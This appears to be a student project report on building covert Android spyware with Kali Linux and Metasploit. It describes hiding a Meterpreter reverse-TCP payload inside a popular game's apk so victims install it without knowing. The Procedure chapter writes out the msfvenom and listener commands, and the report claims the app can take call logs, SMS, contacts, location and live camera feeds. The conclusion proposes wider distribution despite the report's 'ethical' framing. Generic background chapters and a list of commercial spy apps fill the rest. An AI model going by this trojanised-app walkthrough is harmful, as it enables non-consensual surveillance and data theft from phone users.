Stealth Application Using Kali Linux
Stealth Application Using Kali Linux
LINUX
Submitted to:
Prof. Darshana Pachkawade
(Department Of Humanities)
I
Summary
The term ‘Stealth’ applies to certain computer viruses, and to a state of affairs in
which a computer or port is rendered invisible to hacking programs. A stealth
application is an application that enables an attacker or any person who is not the
owner of the computer system under question to operate or gain information from the
target device. The operating system used is Kali Linux which is commonly used for
digital forensics and penetration testing. It’s inbuilt tool Metasploit Interpreter which
is an advanced mulitifunction payload used for writing, testing and using exploit code
is used for carrying out the stealth work. A commonly application is binded with the
apk (i.e. Android application PacKage- the package file format used by the Android
operating system for distribution and installation of mobile apps) which can be
installed through a web link or a bluetooth transfer on any android mobile phone. The
apk is in the form of an invisible attachment i.e there is no icon suggesting the
presence of an extra app except what the user originally wanted to install so as to be
hidden from the user. The application contacts the main server as per the programmed
time and receives the instructions such as to retrieve call logs, SMSes, current
location, etc. In case of absence of the internet the application also sends the
information through SMS in stealth mode. Stealth programs allow security nodes to
be disabled and resources to be looted. The project is made with an ethical intention.
Such an application if used for ethical needs will be helpful in tracking down the
device usage of suspicious people and putting an end to the activity and also in the
detection and prevention of destruction, violence and extremism.
II
Table Of Contents
Acknowledgement I
Summary II
1. Introduction 1
2. Literature Review 2
3. Methodology 4
4. Procedure 5
5. Kali Linux 7
6. Metasploit Interpreter 10
7. Ethical Hacking 13
8. Cyber Security 16
9. Conclusion & Future Scope 19
References III
Appendix IV
Index V
Chapter 01
Introduction
The concept of stealth is to operate or hide without giving enemy forces any
indications as to the presence of friendly forces. Stealth technology is a sub discipline
of military tactics, which covers a range of techniques wised with personal aircraft,
ships, submarines, missiles, satellites to make them less visible to the infrared,
radar,sonar and other detection methods. Generally, stealth describes any approach to
doing something while avoiding notice. In computing, stealth refers to an event,
object, or file that evades methodical attempts to find it.
The idea of a stealth application comes from stealth viruses which are used by hackers
to gain access into some other user’s system without their permission. Stealth viruses
are nothing new. The first known virus for PCs, Brain (reportedly created by software
developers as an anti-piracy measure), was a stealth virus that infected the boot sector
in storage.
The creation of a stealth application was a challenge as the app has to be made in a
way as to not violate the user’s privacy and at the same time to tactically gain the
information required. The stealth application that was created was an application
meant not to exploit a innocent user but to gain information from or to track the
people involved in some kind of an activity that would cause harm to the society.
1
Chapter 02
Literature Review
Konglin Zhu, Xiaoman He, Bin Xiang and Lin Zhang of School of Information and
Communication Engineering, Beijing University of Posts and Telecommunications,
Beijing, China and Achille Pattavina of Dipartimento di Elettronica e Informazione,
Politecnico di Milano, Milano, Italy published a research paper for Hindawi
Publishing Corporation titled How Dangerous Are Your Smartphones? App Usage
Recommendation with Privacy Preserving on 24 May 2016. Their research was based
around the fact that the apps that are recommended to a user are based on popularity
and the privacy of the app is not considered. They provided a solution to this problem
by modifying the app stores recommendation constraints thus giving the apps with
better privacy more recommendation. They even proposed a privacy evaluation
mechanism by analyzing app data usage.
Serge Egelman, Adrienne Porter Felt and David Wagner of university of California,
Berkeley published a research paper titled Choice Architecture and Smartphone
2
Privacy There’s A Price for “That” in the year of 2016 for International Journal of
Scientific and Research Publications. They researched on how the architectures of
different phones affect their privacy and how the permissions that we grant particular
apps affect our privacy. They even surveyed among smartphone users on the basis of
how much they are willing to pay for an app asking less permissions and having the
least amount of access to user’s personal data and upon more observations they came
to the conclusion that users view the permission to access location as something that
gives them more functionality rather than considering it as an attack on privacy.
3
Chapter 03
Methodology
The motive of the project was to create an app that will be installed in the target’s
device without their knowledge i.e. stealthily. In order to do so an exploit code was
developed and executed against a remote target machine which in this case was the
user’s mobile phone.
A commonly used application like the popular game ‘Flappy Bird’ was used instead
of creating one on our own so that the target will install the app without any
hesitation. The apk of the app was downloaded by the user through a web link or
Bluetooth share. The apk of the stealth application was bounded to the apk of the
gaming app that will be downloaded by the user. As soon as the user installed the
game, the stealth app was installed in the user’s device as well but it remains in
background and the icon won’t be visible to the user. The app will contact the main
server i.e. the system from which the apk was sent, on a regular basis and will send
the information such as the call log, SMSes, the latitude and the longitude of the
current location of the device to the main server. In case of non-availability of the
internet the required information will be extracted and will be sent to the main server
via SMS.
Operating system of server used was Kali Linux which is a Debian-derived Linux
distribution designed for digital forensics and penetration testing. An inbuilt tool
Metasploit interpreter was used for carrying out the stealth work. It is used by novices
and advanced professionals. Metapreter- as it is commonly known, is among the most
widely used exploitation tool in the hacking/security field. It is an exploitation
framework and is used as a tool for developing and executing exploit code against a
remote target machine which in this case is the user’s mobile phone. It was used to
upload the file in the target device and is used to control the operations from the main
server.
4
Chapter 04
Procedure
The procedure for binding the apk of the stealth app along with the apk of the user’s
app is as follows:
1. Making the Malicious Apk:
We started off by making our meterpreter apk. We entered this code in the terminal:-
msfvenom -p android/meterpreter/reversetcp LHOST=(your ip) LPORT=(your port) -
o app.apk
2. Setting up a Listener:
The following commands were entered to set up a listener
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.4
Exploit
5
3. Extraction:
To extract information about the user’s call logs,sms,etc. We use the following
commands which can be easily sought whenever needed by tying the ‘help command:
Using the above command we can extract the call logs, smses, contacts,etc. We can
also access their camera and can live stream from the user’s device. We can
6
Chapter 05
Kali Linux
Kali Linux was released on the 13th March, 2013 as a complete, top-to-
bottom rebuild of BackTrack Linux, adhering completely to Debian development
standards.
More than 600 penetration testing tools included: After reviewing every
tool that was included in BackTrack, we eliminated a great number of tools that
either simply did not work or which duplicated other tools that provided the
same or similar functionality. Details on what’s included are on the Kali
Tools site.
Free and always will be: Kali Linux, like BackTrack, is completely free of
charge and always will be. You will never, ever have to pay for Kali Linux.
Open source Git tree: We are committed to the open source development
model and our development tree is available for all to see. All of the
source code which goes into Kali Linux is available for anyone who wants to
tweak or rebuild packages to suit their specific needs.
7
Custom kernel, patched for injection: As penetration testers, the
development team often needs to do wireless assessments, so our kernel has the
latest injection patches included.
8
Kali Linux is specifically geared to meet the requirements of professional penetration
testing and security auditing. To achieve this, several core changes have been
implemented in Kali Linux which reflect these needs:
Single user, root access by design: Due to the nature of security audits, Kali
Linux is designed to be used in a “single, root user” scenario. Many of the
tools used in penetration testing require escalated privileges, and while it’s
generally sound policy to only enable root privileges when necessary, in the
use cases that Kali Linux is aimed at, this approach would be a burden.
Custom Linux kernel: Kali Linux uses an upstream kernel, patched for
wireless injection.
A minimal and trusted set of repositories: given the aims and goals of Kali
Linux, maintaining the integrity of the system as a whole is absolutely key.
With that goal in mind, the set of upstream software sources which Kali uses
is kept to an absolute minimum. Many new Kali users are tempted to add
additional repositories to their sources.list, but doing so runs a very serious
risk of breaking your Kali Linux installation.
9
Chapter 06
Metasploit Interpreter
The Metasploit Framework is a platform for writing, testing, and using exploitcode.
The primary users of the Framework are professionals performing penetration testing,
shellcode development, and vulnerability research.Other important sub-projects
include the Opcode Database, shellcode archive and related research.The Metasploit
Project is well known for its anti-forensic and evasion tools, some of which are built
into the Metasploit Framework.
Metasploit runs on Unix (including Linux and Mac OS X) and on Windows. The
Metasploit Framework can be extended to use add-ons in multiple languages.To
choose an exploit and payload, some information about the target system is needed,
10
such as operating system version and installed network services.Metasploit currently
has over 495.3 payloads. Some of them are:
11
hashdump - The ‘hashdump‘ post module will dump the contents of the SAM
database.
ps - The ‘ps‘ command displays a list of running processes on the target.
Powerful:
Meterpreter utilizes a channelized communication system.
The TLV protocol has few limitations.
Extensible:
Features can be augmented at runtime and are loaded over the network.
New features can be added to Meterpreter without having to rebuild it.
12
Chapter 07
Ethical Hacking
Ethical hackers are expected to report all the vulnerabilities and weakness found
during the process to the management.Ethical hackers use their skills and many of the
same methods and techniques to test and bypass organizations' IT security as their
unethical counterparts, who are referred to as black hat hackers. However, rather than
taking advantage of any vulnerabilities they find for personal gain, ethical hackers
document them and provide advice about how to remediate them so organizations can
strengthen their overall security.
13
Ethical hackers generally find security exposures in insecure system configurations,
known and unknown hardware or software vulnerabilities as well as operational
weaknesses in process or technical countermeasures.
Any organization that has a network connected to the Internet or provides an online
service should consider subjecting it to penetration testing conducted by ethical
hackers.
Apart from testing duties, ethical hackers are associated with other responsibilities.
The main idea is to replicate a malicious hacker at work and instead of exploiting the
vulnerabilities for malicious purposes, seek countermeasures to shore up the system’s
defenses. An ethical hacker might employ all or some of these strategies to penetrate a
system:
Scanning ports and seeking vulnerabilities: An ethical hacker uses port scanning
tools like Nmap or Nessus to scan one’s own systems and find open ports. The
vulnerabilities with each of the ports can be studied and remedial measures can be
taken.
An ethical hacker will examine patch installations and make sure that they cannot
be exploited.
The ethical hacker may engage in social engineering concepts like dumpster
diving—rummaging through trash bins for passwords, charts, sticky notes, or
anything with crucial information that can be used to generate an attack.
An ethical hacker may also employ other social engineering techniques like
shoulder surfing to gain access to crucial information or play the kindness card to
trick employees to part with their passwords.
An ethical hacker will attempt to evade IDS (Intrusion Detection systems), IPS
(Intrusion Prevention systems), honeypots, and firewalls.
14
Ethical hackers may also handle issues related to laptop theft and employee
fraud.
While some may argue that there is no such thing as a good hacker and all white hat
hackers are actually bad hackers who have turned a new leaf, the profession is here to
stay.
As with any profession, passion for the industry is one of the key aspects to success.
This, combined with a good knowledge of networking and programming, will help a
professional succeed in the ethical hacking field.
15
Chapter 08
Cyber Security
Application security
Information security
Network security
Operational security
End-user education
One of the most problematic elements of cyber security is the constantly evolving
nature of security risks. The traditional approach has been to focus resources on
crucial system components and protect against the biggest known threats, which
meant leaving components undefended and not protecting systems against less
dangerous risks.
To deal with the current environment, advisory organizations are promoting a more
proactive and adaptive approach. The National Institute of Standards and Technology
(NIST), for example, recently issued updated guidelines in its risk assessment
framework that recommend a shift toward continuous monitoring and real-time
assessments.
16
Version 1.1 of the Framework for Improving Critical Infrastructure was released in
April 2018. The voluntary cyber security framework, developed for use in the
banking, communications, defense and energy industries, can be adopted by all
sectors, including federal and state governments. President Donald Trump issued an
executive order mandating that federal agencies adopt the NIST Cyber security
Framework (NIST CSF) in May 2017.
The process of keeping up with new technologies, security trends and threat
intelligence is a challenging task. However, it's necessary in order to protect
information and other assets from cyberthreats, which take many forms.
Malware is any file or program used to harm a computer user, such as worms,
computer viruses, Trojan horses and spyware.
Social engineering is an attack that relies on human interaction to trick users into
breaking security procedures in order to gain sensitive information that is
typically protected.
Phishing is a form of fraud where fraudulent emails are sent that resemble emails
from reputable sources; however, the intention of these emails is to steal sensitive
data, such as credit card or login information.
The use of cybersecurity can help prevent cyberattacks, data breaches and identity
theft and can aid in risk management. When an organization has a strong sense of
network security and an effective incident response plan, it is better able to prevent
and mitigate these attacks. For example, end user protection defends information and
guards against loss or theft while also scanning computers for malicious code.
17
As the cyberthreat landscape continues to grow and emerging threats, such as the
internet of things, require hardware and software skills, it is estimated that there are 1
million unfilled cybersecurity jobs worldwide. IT professionals and other computer
specialists are needed in security jobs, such as:
Security engineer : this individual protects company assets from threats with a
focus on quality control within the IT infrastructure.
Security analyst : this individual has several responsibilities that include planning
security measures and controls, protecting digital files, and conducting both
internal and external security audits.
18
Chapter 09
Conclusion and Future Scope
The app created currently is quite basic and can be made more advanced by providing
more options of control over the target’s device. This will be a great help to the cyber
cell to detect any unethical or corrupt doings. It can be made more secure by adding
certain advanced features and it can be bound with a much more frequently used
application than what is used to ensure it’s widespread distribution in the time of
need.
As every coin has two sides, an application that uses stealth technology does too. It
can be extremely helpful in maintaining peace in the society if used with the intention
of public welfare but at the same time it can cause equal amount of harm if used for
the wrong deed. It can be used in tracking unethical hackers by the cyber cell so as to
catch the person responsible and to put an end to the suspicious activity. It can also be
used by the defense system of the country to prevent any violent activity and thereby
maintain peace in the society. Highster Mobile is a powerful monitoring app with
highly advanced features. Backed with the latest technology, it offers an extremely
useful technology for monitoring and user safety. The stealth app’s location tracer
receiver can give you information of the current location of the phone in case one’s
phone is lost.
The stealth application will provide a very quick way to track any illegal or unethical
activities if used in the right way by the right hands. The people managing the
application should be totally aware of their ethics and boundaries of the use of the
application. Some cell phone monitoring software companies suggest that proper
consent should be done before the installation of a stealth app. It should be made in an
ethical manner in which the phone user must be aware that his or her phone activities
will be watched upon for the sole reason of ‘monitoring’ in order to maintain safety.
The creation of the stealth app is not with the intention of invading a person’s privacy
but more in the aspect of simply monitoring required phone activities and the people
coming in contact with the user of the phone.
19
References
Daming D. Chen, Manuel Egele, Maverick Woo, and David Brumley(2016), Towards
AutomatedDynamic Analysis for Linux-based Embedded Firmware, International
journal of open sourcetechnology [online]available:
http://www.engpaper.com/linux-2016.htm
G.Suganya, and K.E Narayana (2014), Defending Stealthy Mode attacks by live
detection and adoptable learning technique, International journal of computer science
and
mobilecomputation.[online]available:https://www.ijcsmc.com/docs/papers/April2014/
V3I4201499a84.pdf
III
Appendix
Stealth apps in the market- It’s no big deal to find spying apps that let you monitor
someone’s WhatsApp conversations and multimedia. Some let you spy on the
messages only, while there are such advanced apps too that facilitate monitoring
WhatsApp call logs and the multimedia shared along the conversation. They are as
follows:
1. XNSPY
2. TrackMyFone
3. Spyzie
4. Flexispy
5. Highster Mobile
6. Spymaster Pro
7. GuestSpy
8. Appmia
9. SpyBubble
IV
Index
E
Exploit code 01
M
Malware 17
Metasploit Framework 10
P
Penetration Testing 07
R
Ransomware 17
W
White Hat Haker 13